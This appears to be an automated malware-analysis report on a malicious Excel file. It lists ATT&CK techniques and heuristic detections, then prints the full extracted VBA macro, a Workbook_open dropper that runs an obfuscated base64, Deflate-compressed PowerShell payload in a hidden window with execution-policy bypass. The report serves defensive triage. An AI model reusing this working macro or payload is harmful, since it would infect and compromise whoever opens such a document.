Verdict: MALICIOUS
Risk Score: 306
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
The sample is an Excel file containing a Workbook_Open VBA macro that uses a Shell() call to execute a PowerShell command. The macro concatenates a large obfuscated string, likely a base64-encoded payload, and passes it to powershell.exe, which decodes and decompresses it (via DeflateStream) before handing it to Invoke-Expression. This indicates the intent to download and execute a second-stage payload.
Heuristics (10)
- ClamAV: Xls.Dropper.Agent-7010572-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7010572-0
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `If Environ("PROCESSOR_ARCHITECTURE") = "x86" Then Shell (exec32) Else`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `exec32 = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec32 = exec32 + "and ""Invoke-Expression $(New-Object IO.StreamRe"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Attribute VB_Customizable = True 'Uncomment the appropriate line below. Document_open for Word and Workbook_open for excel 'Sub Document_open()`
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Attribute VB_Customizable = True 'Uncomment the appropriate line below. Document_open for Word and Workbook_open for excel 'Sub Document_open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `exec64 = Environ("WINDIR") + "\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm" exec64 = exec64 + "and ""Invoke-Expression $(New-Object IO.StreamRe"`
- Reference to PowerShell (high, SC_STR_POWERSHELL)
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3183 bytes |

SHA-256: 8a0d6546c09d7d04a3fb9a00d7054cf15ab2db7f52f66eb19faee9632af0fdd2

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 6 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Uncomment the appropriate line below. Document_open for Word and Workbook_open for excel
'Sub Document_open()
Sub Workbook_open()
Dim exec32 As String
Dim exec64 As String
Dim str As String
str = "nVRtb9pIEP7OrxhZe5KtYMcELi9YkUpJc81doTSkSe8QOi32gLesd531OoFQ/nvHxEfo1/vi9Yxn53lm5hmzR7iEd05jciXlTZZrY11niUahbJ8EiZSON4W8nEkRQ2G5pQNXlr7DjbIja+BeGFty2ZNSx27tk3kvSQwWRRNKoSwkz2PxgrUxf42lVFrdrfM398hoi7H1"
str = str + "ov/NpW+QW7xL6UjeuLzaPWuNmJUWD0hZHi9fme2DyWfsnv3ePeKGZ0hY+8s7LCrhWvLFYeQr2k1CZTjvGtasNyyhDju99/2rD9d/fLz5869Pg+Hn0Zfb8d3X+4dvf//DZ3GC80Uqvi9lpnT+aApbPj2v1i9h66Td+f307PzCCe50P+WmZwxfu15jXqq4QofYZU/eBgza"
str = str + "kvrguhNiN5lOgT39egN+wAB5URr0P8++U5vBH5eZF9ADfoNw1QpD8PERLk687Vt2Cxs2r9g7USsI2j/mmoqLU1/vUtC3o0tgycRdoPUNV4nOwM/4SmSUlSXBJ1QLm3rTbVTzY/PoIDvCBnKjY2o1bCa8IjplK4KjxxGwf7cRoEqIworYF6SGGhc2rsLn/4zbHa4XKNKC"
str = str + "6223BwCLDRBjcJm4DCMmwJcWTjv0dnTkbVhKSDZiywowIQSMAOoC6YoEQXyXFFdUAWnFSEYg5uBSzwvPg33XKYJga8O5ePr21aEyJ0O0wRjNk4hxpGksA674As202628aPporJgL2gS851IkOzn1uZQzkiVhbpg1JW4jlpExpILrwY3XhcUsqNI/4KwvBSobNVgWfCTh"
str = str + "oSkCkq/rlAUan/CUdZrgDPSLkJIfd4KQ+OssJ7CZpIoH45sPcBq0IngQ1MfnAoZ3nuNFTBHoIoLJ+7XFnaDyqg1ZcKWfldQ8ueKWu05qbV50j487YdDqtIPWOaU6O+t2Ou1jphzwGkzTNSLkV6tO4sBshuYK50KJ3YjYI/hDWi1wCL994oCvyCpyHiPsPNf1MAvwc14U"
str = str + "NjVlg60ume52f/n1hE2W14Jrhqt2GIZ0dEIvmtT9ui2VFRkGtKlodF5PpggG3BQplzSWvs7XLsubEDZh8rrQU5etaJHIaJ+4nteEPUhVGl05/OMQYpOtmtURVgunS+urUpJqdn8VfywRc9o7jDXJ+vy0E4Zbmn6cbrY/AQ=="
exec32 = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec32 = exec32 + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec32 = exec32 + "ader ($(New-Object IO.Compression.DeflateStream "
exec32 = exec32 + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec32 = exec32 + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec32 = exec32 + "ression.CompressionMode]::Decompress)), [Text.En"
exec32 = exec32 + "coding]::ASCII)).ReadToEnd();"""
exec64 = Environ("WINDIR") + "\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec64 = exec64 + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec64 = exec64 + "ader ($(New-Object IO.Compression.DeflateStream "
exec64 = exec64 + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec64 = exec64 + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec64 = exec64 + "ression.CompressionMode]::Decompress)), [Text.En"
exec64 = exec64 + "coding]::ASCII)).ReadToEnd();"""
If Environ("PROCESSOR_ARCHITECTURE") = "x86" Then
Shell (exec32)
Else
Shell (exec64)
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True